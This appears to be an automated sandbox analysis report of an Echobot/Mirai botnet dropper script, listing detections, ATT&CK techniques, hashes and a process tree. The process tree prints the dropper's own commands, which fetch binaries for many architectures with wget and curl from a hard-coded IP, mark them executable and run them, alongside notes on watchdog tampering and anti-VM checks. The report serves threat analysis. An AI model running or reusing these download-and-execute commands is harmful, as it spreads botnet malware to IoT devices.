echobot | b86582605641a45410c0811cec9d1d19deb98bb5c4f5cd27caa06949e2ec7e30

Analysis

max time kernel
150s
max time network
154s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
25-11-2024 21:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

2KB
MD5

81eee2b1d28af46c8e9190b0c20fce28
SHA1

8025e6d6f83b129d6c7a11a684d5d6f54d160333
SHA256

b86582605641a45410c0811cec9d1d19deb98bb5c4f5cd27caa06949e2ec7e30
SHA512

359baa5371f4f8cbd4c3caf9cb1b02624b22d8cadd63722c2a9db673e73df55f6f75988e988911ee731e3b30b5a1c22207cd9a8aebb933c38bab17f9a1f8df45

Score

10^/10

echobot mirai antivm botnet defense_evasion discovery trojan

Malware Config

Signatures

Detected Echobot 3 IoCs

Processes:

resource	yara_rule
/tmp/Chaotic	family_echobot
/tmp/Chaotic	family_echobot
/tmp/Chaotic	family_echobot

Echobot
An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.
botnet trojan echobot
Echobot family
echobot
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (106096) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid process

710 chmod
776 chmod
894 chmod
910 chmod
682 chmod
688 chmod
814 chmod
862 chmod
728 chmod
761 chmod
846 chmod
672 chmod
695 chmod
744 chmod
878 chmod

pid	process
710	chmod
776	chmod
894	chmod
910	chmod
682	chmod
688	chmod
814	chmod
862	chmod
728	chmod
761	chmod
846	chmod
672	chmod
695	chmod
744	chmod
878	chmod

Executes dropped EXE 15 IoCs

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

ioc	pid	process
/tmp/Chaotic	673	Chaotic
/tmp/Chaotic	683	Chaotic
/tmp/Chaotic	689	Chaotic
/tmp/Chaotic	696	Chaotic
/tmp/Chaotic	711	Chaotic
/tmp/Chaotic	729	Chaotic
/tmp/Chaotic	745	Chaotic
/tmp/Chaotic	762	Chaotic
/tmp/Chaotic	777	Chaotic
/tmp/Chaotic	815	Chaotic
/tmp/Chaotic	847	Chaotic
/tmp/Chaotic	863	Chaotic
/tmp/Chaotic	879	Chaotic
/tmp/Chaotic	895	Chaotic
/tmp/Chaotic	911	Chaotic

Modifies Watchdog functionality 1 TTPs 16 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic

Enumerates active TCP sockets 1 TTPs 8 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic

Changes its process name 8 IoCs

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	pid	process
Changes the process name, possibly in an attempt to hide itself	0j12cc4a1injm40ji4m	762	Chaotic
Changes the process name, possibly in an attempt to hide itself	4hn1hmjhf2d3c4142c	777	Chaotic
Changes the process name, possibly in an attempt to hide itself	cmk0inegiepch1oeh1	815	Chaotic
Changes the process name, possibly in an attempt to hide itself	a32caeamfa2nine1	847	Chaotic
Changes the process name, possibly in an attempt to hide itself	3h3h1jkkbanbghd4n0n	863	Chaotic
Changes the process name, possibly in an attempt to hide itself	iekdh1mo1gpf	879	Chaotic
Changes the process name, possibly in an attempt to hide itself	ak2j4j1da	895	Chaotic
Changes the process name, possibly in an attempt to hide itself	e2i3bngnamje4nn5mkp	911	Chaotic

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads system network configuration 1 TTPs 8 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

Processes:

ChaoticChaoticChaoticChaoticChaoticChaoticChaoticChaotic

description	ioc	process
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic
File opened for reading	/proc/net/tcp	Chaotic

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

ChaoticChaoticChaoticChaoticChaoticcurlChaoticChaoticChaoticcurlcurlcurlcurlcurl

description	ioc	process
File opened for reading	/proc/644/fd	Chaotic
File opened for reading	/proc/458/fd	Chaotic
File opened for reading	/proc/644/fd	Chaotic
File opened for reading	/proc/312/fd	Chaotic
File opened for reading	/proc/410/fd	Chaotic
File opened for reading	/proc/1/fd	Chaotic
File opened for reading	/proc/789/fd	Chaotic
File opened for reading	/proc/789/fd	Chaotic
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/267/fd	Chaotic
File opened for reading	/proc/599/fd	Chaotic
File opened for reading	/proc/271/fd	Chaotic
File opened for reading	/proc/644/fd	Chaotic
File opened for reading	/proc/162/fd	Chaotic
File opened for reading	/proc/599/fd	Chaotic
File opened for reading	/proc/457/fd	Chaotic
File opened for reading	/proc/458/fd	Chaotic
File opened for reading	/proc/646/fd	Chaotic
File opened for reading	/proc/410/fd	Chaotic
File opened for reading	/proc/646/fd	Chaotic
File opened for reading	/proc/265/fd	Chaotic
File opened for reading	/proc/306/fd	Chaotic
File opened for reading	/proc/212/fd	Chaotic
File opened for reading	/proc/162/fd	Chaotic
File opened for reading	/proc/299/fd	Chaotic
File opened for reading	/proc/458/fd	Chaotic
File opened for reading	/proc/457/fd	Chaotic
File opened for reading	/proc/740/fd	Chaotic
File opened for reading	/proc/212/fd	Chaotic
File opened for reading	/proc/599/fd	Chaotic
File opened for reading	/proc/296/fd	Chaotic
File opened for reading	/proc/644/fd	Chaotic
File opened for reading	/proc/882/exe	Chaotic
File opened for reading	/proc/269/fd	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/271/fd	Chaotic
File opened for reading	/proc/299/fd	Chaotic
File opened for reading	/proc/136/fd	Chaotic
File opened for reading	/proc/646/fd	Chaotic
File opened for reading	/proc/898/exe	Chaotic
File opened for reading	/proc/269/fd	Chaotic
File opened for reading	/proc/644/fd	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/267/fd	Chaotic
File opened for reading	/proc/269/fd	Chaotic
File opened for reading	/proc/841/exe	Chaotic
File opened for reading	/proc/265/fd	Chaotic
File opened for reading	/proc/136/fd	Chaotic
File opened for reading	/proc/162/fd	Chaotic
File opened for reading	/proc/410/fd	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/796/fd	Chaotic
File opened for reading	/proc/410/fd	Chaotic
File opened for reading	/proc/646/fd	Chaotic
File opened for reading	/proc/850/fd	Chaotic
File opened for reading	/proc/296/fd	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/162/fd	Chaotic
File opened for reading	/proc/296/fd	Chaotic
File opened for reading	/proc/850/exe	Chaotic
File opened for reading	/proc/267/fd	Chaotic
File opened for reading	/proc/312/fd	Chaotic
File opened for reading	/proc/296/fd	Chaotic

System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
discovery

System Network Configuration Discovery
T1016

Processes:

wgetcurlcatwgetcurlcat

pid process

697 wget
700 curl
708 cat
713 wget
716 curl
726 cat

pid	process
697	wget
700	curl
708	cat
713	wget
716	curl
726	cat

Writes file to tmp directory 27 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlwgetwgetcurlcurlcurlwgetwgetwgetcurlwgetwgetcurlcurlcurlcurlcurlcurlcurlcurlohshit.shwgetcurlwgetcurlwgetcp

description	ioc	process
File opened for modification	/tmp/jade.m68k	curl
File opened for modification	/tmp/jade.arm5	wget
File opened for modification	/tmp/jade.ppc	wget
File opened for modification	/tmp/jade.sh4	curl
File opened for modification	/tmp/jade.arc	curl
File opened for modification	/tmp/jade.mips	curl
File opened for modification	/tmp/jade.arm	wget
File opened for modification	/tmp/jade.m68k	wget
File opened for modification	/tmp/jade.x86	wget
File opened for modification	/tmp/jade.mpsl	curl
File opened for modification	/tmp/jade.arm6	wget
File opened for modification	/tmp/jade.arm7	wget
File opened for modification	/tmp/jade.x86	curl
File opened for modification	/tmp/jade.arm6	curl
File opened for modification	/tmp/jade.arm7	curl
File opened for modification	/tmp/jade.x86_64	curl
File opened for modification	/tmp/jade.i686	curl
File opened for modification	/tmp/jade.arm	curl
File opened for modification	/tmp/jade.arm5	curl
File opened for modification	/tmp/jade.sparc	curl
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/jade.mips	wget
File opened for modification	/tmp/jade.mips64	curl
File opened for modification	/tmp/jade.mpsl	wget
File opened for modification	/tmp/jade.ppc	curl
File opened for modification	/tmp/jade.sh4	wget
File opened for modification	/tmp/busybox	cp

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Writes file to tmp directory
PID:644
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:651
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arc
  2⤵
  PID:654
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:660
- /bin/cat
  cat jade.arc
  2⤵
  PID:670
- /bin/chmod
  chmod +x busybox Chaotic jade.arc ohshit.sh systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-9JGCVA
  2⤵
  - File and Directory Permissions Modification
  PID:672
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:673
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.x86
  2⤵
  - Writes file to tmp directory
  PID:674
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:678
- /bin/cat
  cat jade.x86
  2⤵
  PID:681
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.x86 ohshit.sh systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-9JGCVA
  2⤵
  - File and Directory Permissions Modification
  PID:682
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:683
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.x86_64
  2⤵
  PID:685
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.x86_64
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:686
- /bin/cat
  cat jade.x86_64
  2⤵
  PID:687
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.x86 jade.x86_64 ohshit.sh systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-9JGCVA
  2⤵
  - File and Directory Permissions Modification
  PID:688
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:689
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.i686
  2⤵
  PID:690
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.i686
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:691
- /bin/cat
  cat jade.i686
  2⤵
  PID:692
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.i686 jade.x86 jade.x86_64 ohshit.sh systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-9JGCVA
  2⤵
  - File and Directory Permissions Modification
  PID:695
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:696
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:697
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:700
- /bin/cat
  cat jade.mips
  2⤵
  - System Network Configuration Discovery
  PID:708
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.i686 jade.mips jade.x86 jade.x86_64 ohshit.sh systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-9JGCVA
  2⤵
  - File and Directory Permissions Modification
  PID:710
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:711
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.mips64
  2⤵
  - System Network Configuration Discovery
  PID:713
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.mips64
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:716
- /bin/cat
  cat jade.mips64
  2⤵
  - System Network Configuration Discovery
  PID:726
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.i686 jade.mips jade.mips64 jade.x86 jade.x86_64 ohshit.sh systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-9JGCVA
  2⤵
  - File and Directory Permissions Modification
  PID:728
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:729
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.mpsl
  2⤵
  - Writes file to tmp directory
  PID:730
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.mpsl
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:736
- /bin/cat
  cat jade.mpsl
  2⤵
  PID:742
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 ohshit.sh systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-9JGCVA
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  PID:745
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm
  2⤵
  - Writes file to tmp directory
  PID:748
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:753
- /bin/cat
  cat jade.arm
  2⤵
  PID:760
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 ohshit.sh systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-9JGCVA
  2⤵
  - File and Directory Permissions Modification
  PID:761
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:762
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm5
  2⤵
  - Writes file to tmp directory
  PID:766
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:774
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 ohshit.sh systemd-private-3e34c1a6cb7141d78b470c83939659a5-systemd-timedated.service-9JGCVA
  2⤵
  - File and Directory Permissions Modification
  PID:776
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:777
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm6
  2⤵
  - Writes file to tmp directory
  PID:799
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:808
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.arm6 jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 ohshit.sh
  2⤵
  - File and Directory Permissions Modification
  PID:814
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:815
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.arm7
  2⤵
  - Writes file to tmp directory
  PID:837
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.arm7
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:844
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.mips jade.mips64 jade.mpsl jade.x86 jade.x86_64 ohshit.sh
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:847
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.ppc
  2⤵
  - Writes file to tmp directory
  PID:858
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.ppc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:860
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.mips jade.mips64 jade.mpsl jade.ppc jade.x86 jade.x86_64 ohshit.sh
  2⤵
  - File and Directory Permissions Modification
  PID:862
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:863
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.sparc
  2⤵
  PID:872
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.sparc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:876
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.mips jade.mips64 jade.mpsl jade.ppc jade.sparc jade.x86 jade.x86_64 ohshit.sh
  2⤵
  - File and Directory Permissions Modification
  PID:878
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:879
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.m68k
  2⤵
  - Writes file to tmp directory
  PID:885
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.m68k
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:892
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.m68k jade.mips jade.mips64 jade.mpsl jade.ppc jade.sparc jade.x86 jade.x86_64 ohshit.sh
  2⤵
  - File and Directory Permissions Modification
  PID:894
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:895
- /usr/bin/wget
  wget http://64.235.37.140/bins/jade.sh4
  2⤵
  - Writes file to tmp directory
  PID:904
- /usr/bin/curl
  curl -O http://64.235.37.140/bins/jade.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:908
- /bin/chmod
  chmod +x busybox Chaotic jade.arc jade.arm jade.arm5 jade.arm6 jade.arm7 jade.i686 jade.m68k jade.mips jade.mips64 jade.mpsl jade.ppc jade.sh4 jade.sparc jade.x86 jade.x86_64 ohshit.sh
  2⤵
  - File and Directory Permissions Modification
  PID:910
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Changes its process name
  - Reads system network configuration
  - Reads runtime system information
  PID:911

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
68KB

MD5
60e197919a265617f21c21e25320c549

SHA1
b06f09b251f855c2e3cadbee08e426be790698cf

SHA256
bd145676c6767709d39d47eb2bb2fe5051b790db64bf150b233d3f49438346b2

SHA512
652f8341e27f00272f3ee4164900c5f02e0c7c763b9edc0405107ce2126ce2c700c9318e3ea29a73125d77d4b16b961860a514b0580170d019976fa7765792d1

Download Submit
/tmp/Chaotic

Filesize
95KB

MD5
2856dfee64ce9df390f7c08f3faa4511

SHA1
a39ec395140d9f12df3f3ce77b40380a22bcd336

SHA256
10cde4e442151ff031996d6cd72f7da0df4ce93f434caed9a21e14ed1e1a60dc

SHA512
d089fe05d65e225b160306f738588496119d1329c24aba8613b751388f49f8deb0ec45c0ac2a1df40e3208102404d0a029a2c72fd4bef9db6c31080afcee5b3e

Download Submit
/tmp/Chaotic

Filesize
99KB

MD5
66be265a705fef7afdbf7a0225b79bf5

SHA1
41148213aaf7c47d5f100e46e95c01c04a048ecf

SHA256
ccba950254fd41cd63ca06d39dd224e46c9a0b45b17699e0421ef8e19d69ebd8

SHA512
fbe5bae02a9bf1a5f96eda723e9cfaa86fc81f8acffed7e07987f3dc4ad9d745ce3de1de2b6cee7e9b41cd1437db0212c4678710b30b737299b12c24825a8e2a

Download Submit
/tmp/busybox

Filesize
507KB

MD5
e588bcf03ae78237b58899d35f50c570

SHA1
2194732ebbefbc27bdae876c77f2a97a20175710

SHA256
2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88

SHA512
904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

Download Submit
/tmp/jade.arc

Filesize
275B

MD5
cba0261779bc762dcaa59e48bca8c298

SHA1
f5747b8818b87d36e684c31ee32cae265ae63cd0

SHA256
52ea3a00ff42e925a9f1862b63765b9ac279abb244f7e43ac010e42c76fcc918

SHA512
f322ac8ba03308f52db0478080d60f419d2bc195d4eeccee0365fd66d13f99032c491f55ae952dd9685064825f07b5c8c381a68ca3928c22164009861b3da702

Download Submit